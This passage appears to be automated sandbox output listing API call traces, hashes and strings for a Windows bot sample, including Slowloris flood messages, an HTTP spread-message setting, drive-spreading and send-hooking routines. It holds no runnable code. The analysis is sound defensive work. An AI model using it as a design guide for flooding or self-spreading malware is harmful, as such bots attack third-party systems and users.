                                                                  • lstrcpyW.KERNEL32(003AB9A0,003AADA0), ref: 0036FCF2
                                                                  • lstrcpyA.KERNEL32(003ABDB0,RECYCLED), ref: 0036FD08
                                                                  • lstrcpyA.KERNEL32(003ABEB4,?), ref: 0036FD16
                                                                    • Part of subcall function 0036F9E0: memset.MSVCRT ref: 0036F9FF
                                                                    • Part of subcall function 0036F9E0: GetLogicalDriveStringsA.KERNEL32 ref: 0036FA22
                                                                    • Part of subcall function 0036F9E0: lstrcatA.KERNEL32(00000000,00373040), ref: 0036FA5C
                                                                  • Sleep.KERNEL32(00003A98), ref: 0036FD61
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpy$memset$DriveLogicalSleepStrings_snprintflstrcatlstrlen
                                                                  • String ID: %0x.exe$30e44aa1$RECYCLED
                                                                  • API String ID: 530497602-684435549
                                                                  • Opcode ID: 038bc5167953571c183dcd695717a34b9ccc95d2b8bf01a1a522f80f16c3dc47
                                                                  • Instruction ID: 34495751ad4c564055f3154d558ac0157d9077052543804f819e087ad413350a
                                                                  • Opcode Fuzzy Hash: 038bc5167953571c183dcd695717a34b9ccc95d2b8bf01a1a522f80f16c3dc47
                                                                  • Instruction Fuzzy Hash: 4111A7B2940218AFD323AF68AC82AE5B76CEB16700F448069F64856197D7F529C48F51
                                                                  APIs
                                                                  • memset.MSVCRT ref: 004089C5
                                                                  • AcquireCredentialsHandleW.SECUR32(00000000,Microsoft Unified Security Protocol Provider,00000002,00000000,?,00000000,00000000,?,00000000), ref: 00408A32
                                                                  • QueryContextAttributesW.SECUR32(?,00000004,00000001), ref: 00408AC3
                                                                  • InitializeSecurityContextW.SECUR32(?,00000000,?,0008C11C,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00408A79
                                                                    • Part of subcall function 00408760: FreeContextBuffer.SECUR32(?), ref: 00408774
                                                                    • Part of subcall function 00408790: InitializeSecurityContextW.SECUR32(?,?,?,0008C11C,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 004088AE
                                                                  • DeleteSecurityContext.SECUR32(?), ref: 00408B17
                                                                  • FreeCredentialsHandle.SECUR32(?), ref: 00408B1E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Context$Security$CredentialsFreeHandleInitialize$AcquireAttributesBufferDeleteQuerymemset
                                                                  • String ID: $Microsoft Unified Security Protocol Provider
                                                                  • API String ID: 3657786480-3891800672
                                                                  • Opcode ID: af5bcdb1a2eef447009338cc511fe135db259d21b177dfce1ff198aca339893a
                                                                  • Instruction ID: beda717db611c482a8f93d0b8a0973b6a55a9a325cb36f24a7304a88d952abe4
                                                                  • Opcode Fuzzy Hash: af5bcdb1a2eef447009338cc511fe135db259d21b177dfce1ff198aca339893a
                                                                  • Instruction Fuzzy Hash: 605127B1D00208ABDB20DFAADD859EFFBF8FF94704F10452EE505E6251E7B4A6058B64
                                                                  APIs
                                                                  • memset.MSVCRT ref: 003689C5
                                                                  • AcquireCredentialsHandleW.SECUR32(00000000,Microsoft Unified Security Protocol Provider,00000002,00000000,?,00000000,00000000,?,00000000), ref: 00368A32
                                                                  • QueryContextAttributesW.SECUR32(?,00000004,00000001), ref: 00368AC3
                                                                  • InitializeSecurityContextW.SECUR32(?,00000000,?,0008C11C,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00368A79
                                                                    • Part of subcall function 00368760: FreeContextBuffer.SECUR32(?), ref: 00368774
                                                                    • Part of subcall function 00368790: InitializeSecurityContextW.SECUR32(?,?,?,0008C11C,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 003688AE
                                                                  • DeleteSecurityContext.SECUR32(?), ref: 00368B17
                                                                  • FreeCredentialsHandle.SECUR32(?), ref: 00368B1E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Context$Security$CredentialsFreeHandleInitialize$AcquireAttributesBufferDeleteQuerymemset
                                                                  • String ID: $Microsoft Unified Security Protocol Provider
                                                                  • API String ID: 3657786480-3891800672
                                                                  • Opcode ID: 69a5bd4db19f190252c1b7c9026e36aed30769e0d2ebff970da068ee60dff6a9
                                                                  • Instruction ID: 862b6b74ed03e32e2e65e8d4b6987eb21d9028d2a6d32cf160adad4ce33bb399
                                                                  • Opcode Fuzzy Hash: 69a5bd4db19f190252c1b7c9026e36aed30769e0d2ebff970da068ee60dff6a9
                                                                  • Instruction Fuzzy Hash: A55118B1D00208ABDB21DF9ADC859AFFBFCFF98700F10851AE505E7215E7B4A6458B60
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00401D31
                                                                  • memset.MSVCRT ref: 00401D4B
                                                                  • lstrcmpA.KERNEL32(00000000,block), ref: 00401D9B
                                                                  • strstr.MSVCRT ref: 00401DAB
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000400), ref: 00401DCA
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000200,00000000,00000000), ref: 00401E0C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidememset$lstrcmpstrstr
                                                                  • String ID: bdns$block
                                                                  • API String ID: 1883446694-4143068083
                                                                  • Opcode ID: 0186ad86ad553c35ed268445183641265aed177f885356a13713a37939fdbb1b
                                                                  • Instruction ID: 02cb723c2acadd3014a6e1aa2f0b914f9df801f99115c0613e607c9dec7c965c
                                                                  • Opcode Fuzzy Hash: 0186ad86ad553c35ed268445183641265aed177f885356a13713a37939fdbb1b
                                                                  • Instruction Fuzzy Hash: 8B313A756403087BEB20DB55EC0AFEB736CDF84710F00416AFE14B62D1EAB4AE50C6A9
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00361D31
                                                                  • memset.MSVCRT ref: 00361D4B
                                                                  • lstrcmpA.KERNEL32(00000000,block), ref: 00361D9B
                                                                  • strstr.MSVCRT ref: 00361DAB
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000400), ref: 00361DCA
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000200,00000000,00000000), ref: 00361E0C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidememset$lstrcmpstrstr
                                                                  • String ID: bdns$block
                                                                  • API String ID: 1883446694-4143068083
                                                                  • Opcode ID: 94ed2e8dee14fc3d89270e3f1cb6dfb9ea20584cbe66336e81584b56e07710b2
                                                                  • Instruction ID: 997e66308cf864de44e392751d0634f1f44a958501c9d28c5c0193a85efd5a6f
                                                                  • Opcode Fuzzy Hash: 94ed2e8dee14fc3d89270e3f1cb6dfb9ea20584cbe66336e81584b56e07710b2
                                                                  • Instruction Fuzzy Hash: FF31E3B6640204BBEB32DA58DC06FFB736C9F84711F048159FE18AA1C5EAB59A10C6A1
                                                                  APIs
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,00405182,?,?,?,00437AE8), ref: 00403BD8
                                                                  • CreateNamedPipeA.KERNEL32(?,40000001,00000000,000000FF,00010000,00010000,00000000,00000000), ref: 00403C0F
                                                                  • ConnectNamedPipe.KERNEL32(00000000,?,?,?,?,00405182,?,?,?,00437AE8), ref: 00403C25
                                                                  • GetLastError.KERNEL32(?,?,?,00405182,?,?,?,00437AE8), ref: 00403C2F
                                                                  • GetLastError.KERNEL32(?,?,?,00405182,?,?,?,00437AE8), ref: 00403C46
                                                                  • SetEvent.KERNEL32(00000000,?,?,?,00405182,?,?,?,00437AE8), ref: 00403C56
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorEventLastNamedPipe$Connect
                                                                  • String ID: zC
                                                                  • API String ID: 3507186782-3727955402
                                                                  • Opcode ID: 37271feab1efd766603c5ed1eb9c75c67124974bf2be737a9f078a6ab44b23cc
                                                                  • Instruction ID: c73fd8eed312285066e6433c0d2a5033b489b0f8818e27d85342ab9d2f4f481c
                                                                  • Opcode Fuzzy Hash: 37271feab1efd766603c5ed1eb9c75c67124974bf2be737a9f078a6ab44b23cc
                                                                  • Instruction Fuzzy Hash: 5F21D8767442057BE7209F64DCC4BD6BB68EB44751F208536FB0DEA2D0D3B4E9408758
                                                                  APIs
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,00365182,?,?,?,00397AE8), ref: 00363BD8
                                                                  • CreateNamedPipeA.KERNEL32(?,40000001,00000000,000000FF,00010000,00010000,00000000,00000000), ref: 00363C0F
                                                                  • ConnectNamedPipe.KERNEL32(00000000,?,?,?,?,00365182,?,?,?,00397AE8), ref: 00363C25
                                                                  • GetLastError.KERNEL32(?,?,?,00365182,?,?,?,00397AE8), ref: 00363C2F
                                                                  • GetLastError.KERNEL32(?,?,?,00365182,?,?,?,00397AE8), ref: 00363C46
                                                                  • SetEvent.KERNEL32(00000000,?,?,?,00365182,?,?,?,00397AE8), ref: 00363C56
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorEventLastNamedPipe$Connect
                                                                  • String ID: z9
                                                                  • API String ID: 3507186782-1860472296
                                                                  APIs
                                                                  • lstrcmpA.KERNEL32(?,0044AC50), ref: 0040100D
                                                                  • lstrcmpA.KERNEL32(?,0044AA28), ref: 00401054
                                                                  • MoveFileExA.KERNEL32 ref: 00401062
                                                                  • lstrcpyA.KERNEL32(00416D88,?), ref: 0040108B
                                                                  • lstrcpyA.KERNEL32(00416E90,?), ref: 00401093
                                                                    • Part of subcall function 00407700: memset.MSVCRT ref: 0040771E
                                                                    • Part of subcall function 00407700: _snprintf.MSVCRT ref: 00407738
                                                                    • Part of subcall function 00407700: lstrlenA.KERNEL32(00000000), ref: 00407747
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmplstrcpy$FileMove_snprintflstrlenmemset
                                                                  • String ID: %s.%s$pdef$ruskill
                                                                  • API String ID: 4105673886-2574534833
                                                                  APIs
                                                                  • lstrcmpA.KERNEL32(?,003AAC50), ref: 0036100D
                                                                  • lstrcmpA.KERNEL32(?,003AAA28), ref: 00361054
                                                                  • MoveFileExA.KERNEL32 ref: 00361062
                                                                  • lstrcpyA.KERNEL32(00376D88,?), ref: 0036108B
                                                                  • lstrcpyA.KERNEL32(00376E90,?), ref: 00361093
                                                                    • Part of subcall function 00367700: memset.MSVCRT ref: 0036771E
                                                                    • Part of subcall function 00367700: _snprintf.MSVCRT ref: 00367738
                                                                    • Part of subcall function 00367700: lstrlenA.KERNEL32(00000000), ref: 00367747
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmplstrcpy$FileMove_snprintflstrlenmemset
                                                                  • String ID: %s.%s$pdef$ruskill
                                                                  • API String ID: 4105673886-2574534833
                                                                  APIs
                                                                  • strtok.MSVCRT ref: 00409C7C
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 00409C9A
                                                                  • lstrcpyA.KERNEL32(0044B648,00411335), ref: 00409CB3
                                                                  • lstrcpynA.KERNEL32(0044B648,00000000,00000200), ref: 00409CC4
                                                                  • strtok.MSVCRT ref: 00409CDB
                                                                  • atoi.MSVCRT(00000000), ref: 00409CE8
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 00409D73
                                                                  Strings
                                                                  • [Slowloris]: Finished flood on "%s", xrefs: 00409D45
                                                                  • [Slowloris]: Starting flood on "%s" for %d minute(s), xrefs: 00409CF9
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeapstrtok$atoilstrcpylstrcpyn
                                                                  • String ID: [Slowloris]: Finished flood on "%s"$[Slowloris]: Starting flood on "%s" for %d minute(s)
                                                                  • API String ID: 1726920797-1250431664
                                                                  APIs
                                                                  • strtok.MSVCRT ref: 00369C7C
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 00369C9A
                                                                  • lstrcpyA.KERNEL32(003AB648,00371335), ref: 00369CB3
                                                                  • lstrcpynA.KERNEL32(003AB648,00000000,00000200), ref: 00369CC4
                                                                  • strtok.MSVCRT ref: 00369CDB
                                                                  • atoi.MSVCRT(00000000), ref: 00369CE8
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 00369D73
                                                                  Strings
                                                                  • [Slowloris]: Finished flood on "%s", xrefs: 00369D45
                                                                  • [Slowloris]: Starting flood on "%s" for %d minute(s), xrefs: 00369CF9
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeapstrtok$atoilstrcpylstrcpyn
                                                                  • String ID: [Slowloris]: Finished flood on "%s"$[Slowloris]: Starting flood on "%s" for %d minute(s)
                                                                  • API String ID: 1726920797-1250431664
                                                                  APIs
                                                                  • _stricmp.MSVCRT(?,GetAddrInfoW), ref: 00410C14
                                                                  • _stricmp.MSVCRT(?,send), ref: 00410C26
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _stricmp
                                                                  • String ID: GetAddrInfoW$dnsapi.dll$nspr4.dll$send$wininet.dll
                                                                  • API String ID: 2884411883-3553644081
                                                                  APIs
                                                                  • _stricmp.MSVCRT(?,GetAddrInfoW), ref: 00370C14
                                                                  • _stricmp.MSVCRT(?,send), ref: 00370C26
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _stricmp
                                                                  • String ID: GetAddrInfoW$dnsapi.dll$nspr4.dll$send$wininet.dll
                                                                  • API String ID: 2884411883-3553644081
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,?,http.set,?,msn.int,?,004157F4,?,004157F0,?,speed,?,rs0,?,stats), ref: 0040C8DD
                                                                  • lstrlenA.KERNEL32(?,?,http.set,?,msn.int,?,004157F4,?,004157F0,?,speed,?,rs0,?,stats), ref: 0040C8E5
                                                                  • lstrcatA.KERNEL32(00000000,00412C78,?,?,http.set,?,msn.int,?,004157F4,?,004157F0,?,speed,?,rs0), ref: 0040C907
                                                                  • lstrcatA.KERNEL32(00000000,?,?,?,http.set,?,msn.int,?,004157F4,?,004157F0,?,speed,?,rs0), ref: 0040C913
                                                                  • lstrcmpA.KERNEL32(00000000,http.int,?,http.set,?,msn.int,?,004157F4,?,004157F0,?,speed,?,rs0,?,stats), ref: 0040C985
                                                                  • atoi.MSVCRT(?,?,?,http.set,?,msn.int,?,004157F4,?,004157F0,?,speed,?,rs0,?,stats), ref: 0040C99C
                                                                  • atoi.MSVCRT(00000000), ref: 0040C9AF
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: atoilstrcatlstrlen$lstrcmp
                                                                  • String ID: [HTTP]: Updated HTTP spread message to "%s"$http$msg
                                                                  • API String ID: 3861295430-3390247340
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,?,http.set,?,msn.int,?,003757F4,?,003757F0,?,speed,?,rs0,?,stats), ref: 0036C8DD
                                                                  • lstrlenA.KERNEL32(?,?,http.set,?,msn.int,?,003757F4,?,003757F0,?,speed,?,rs0,?,stats), ref: 0036C8E5
                                                                  • lstrcatA.KERNEL32(00000000,00372C78,?,?,http.set,?,msn.int,?,003757F4,?,003757F0,?,speed,?,rs0), ref: 0036C907
                                                                  • lstrcatA.KERNEL32(00000000,?,?,?,http.set,?,msn.int,?,003757F4,?,003757F0,?,speed,?,rs0), ref: 0036C913
                                                                  • lstrcmpA.KERNEL32(00000000,http.int,?,http.set,?,msn.int,?,003757F4,?,003757F0,?,speed,?,rs0,?,stats), ref: 0036C985
                                                                  • atoi.MSVCRT(?,?,?,http.set,?,msn.int,?,003757F4,?,003757F0,?,speed,?,rs0,?,stats), ref: 0036C99C
                                                                  • atoi.MSVCRT(00000000), ref: 0036C9AF
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: atoilstrcatlstrlen$lstrcmp
                                                                  • String ID: [HTTP]: Updated HTTP spread message to "%s"$http$msg
                                                                  • API String ID: 3861295430-3390247340
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,-00417960,00000800,00000000), ref: 00403DFF
                                                                  • GetOverlappedResult.KERNEL32(?,?,?,00000000,?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00403E3E
                                                                  • ReadFile.KERNEL32(?,00417960,00000800,00000000,?), ref: 00403ED7
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00403EE3
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00403EEA
                                                                  • GetLastError.KERNEL32(?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00403EF3
                                                                  • WaitForMultipleObjects.KERNEL32 ref: 00403F0D
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00403F1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileRead$MultipleObjectsOverlappedResultWait
                                                                  • String ID:
                                                                  • API String ID: 146293752-0
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,-00377960,00000800,00000000), ref: 00363DFF
                                                                  • GetOverlappedResult.KERNEL32(?,?,?,00000000,?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00363E3E
                                                                  • ReadFile.KERNEL32(?,00377960,00000800,00000000,?), ref: 00363ED7
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00363EE3
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00363EEA
                                                                  • GetLastError.KERNEL32(?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00363EF3
                                                                  • WaitForMultipleObjects.KERNEL32 ref: 00363F0D
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00363F1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileRead$MultipleObjectsOverlappedResultWait
                                                                  • String ID:
                                                                  • API String ID: 146293752-0
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,-00417960,00000800,00000000), ref: 00403DFF
                                                                  • GetOverlappedResult.KERNEL32(?,?,?,00000000,?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00403E3E
                                                                  • ReadFile.KERNEL32(?,00417960,00000800,00000000,?), ref: 00403ED7
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00403EE3
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00403EEA
                                                                  • GetLastError.KERNEL32(?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00403EF3
                                                                  • WaitForMultipleObjects.KERNEL32 ref: 00403F0D
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00403F1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileRead$MultipleObjectsOverlappedResultWait
                                                                  • String ID:
                                                                  • API String ID: 146293752-0
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,-00377960,00000800,00000000), ref: 00363DFF
                                                                  • GetOverlappedResult.KERNEL32(?,?,?,00000000,?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00363E3E
                                                                  • ReadFile.KERNEL32(?,00377960,00000800,00000000,?), ref: 00363ED7
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00363EE3
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00363EEA
                                                                  • GetLastError.KERNEL32(?,?,?,00000000,000000FF,?,?,00000000,000000FF,?,?), ref: 00363EF3
                                                                  • WaitForMultipleObjects.KERNEL32 ref: 00363F0D
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF,?,?), ref: 00363F1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileRead$MultipleObjectsOverlappedResultWait
                                                                  • String ID:
                                                                  • API String ID: 146293752-0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$_snprintf_vsnprintflstrcmp
                                                                  • String ID: %s_$bdns
                                                                  • API String ID: 3897371274-741241040
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$_snprintf_vsnprintflstrcmp
                                                                  • String ID: %s_$bdns
                                                                  • API String ID: 3897371274-741241040
                                                                  APIs
                                                                  • LocalAlloc.KERNEL32(00000040,0000103C), ref: 00408688
                                                                  • htons.WS2_32(?), ref: 004086AE
                                                                  • inet_ntoa.WS2_32(?), ref: 004086F7
                                                                  • htons.WS2_32(?), ref: 00408704
                                                                  • GetTickCount.KERNEL32 ref: 00408713
                                                                  • CreateThread.KERNEL32(00000000,00000000,00408640,00000000,00000000,00000000), ref: 00408734
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040873B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: htons$AllocCloseCountCreateHandleLocalThreadTickinet_ntoa
                                                                  • String ID:
                                                                  • API String ID: 30336511-0
                                                                  APIs
                                                                  • LocalAlloc.KERNEL32(00000040,0000103C), ref: 00368688
                                                                  • htons.WS2_32(?), ref: 003686AE
                                                                  • inet_ntoa.WS2_32(?), ref: 003686F7
                                                                  • htons.WS2_32(?), ref: 00368704
                                                                  • GetTickCount.KERNEL32 ref: 00368713
                                                                  • CreateThread.KERNEL32(00000000,00000000,00368640,00000000,00000000,00000000), ref: 00368734
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036873B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: htons$AllocCloseCountCreateHandleLocalThreadTickinet_ntoa
                                                                  • String ID:
                                                                  • API String ID: 30336511-0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlenmemset$_snprintflstrcpy
                                                                  • String ID: off$state_%s
                                                                  • API String ID: 1009457118-628336787
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlenmemset$_snprintflstrcpy
                                                                  • String ID: off$state_%s
                                                                  • API String ID: 1009457118-628336787
                                                                  APIs
                                                                  • htons.WS2_32(?), ref: 00402A44
                                                                    • Part of subcall function 00402460: GetProcessHeap.KERNEL32(?,004020DE,?), ref: 0040246C
                                                                    • Part of subcall function 00402460: HeapAlloc.KERNEL32(?,00000008,004020DE,?,004020DE,?), ref: 0040247E
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00402A8A
                                                                  • WSAGetLastError.WS2_32(00000002,00000001,00000006), ref: 00402A96
                                                                  • GetLastError.KERNEL32(00000002,00000001,00000006), ref: 00402A9B
                                                                    • Part of subcall function 004024A0: GetProcessHeap.KERNEL32(00000000,?,00402131,00000000), ref: 004024B4
                                                                    • Part of subcall function 004024A0: HeapFree.KERNEL32(?,00000000,1!@), ref: 004024C3
                                                                  • inet_ntoa.WS2_32(00000002), ref: 00402AEE
                                                                  • connect.WS2_32(00000000,?,00000010), ref: 00402AFC
                                                                  • Sleep.KERNEL32(000005DC,00000000,?,00000010,00000001,00000006), ref: 00402B0B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$ErrorLastProcess$AllocFreeSleepconnecthtonsinet_ntoasocket
                                                                  • String ID:
                                                                  • API String ID: 268164981-0
                                                                  APIs
                                                                  • select.WS2_32(00000000,00000000,?,00000000,?), ref: 00407FD4
                                                                  • send.WS2_32(?,?,?,00000000), ref: 00407FFB
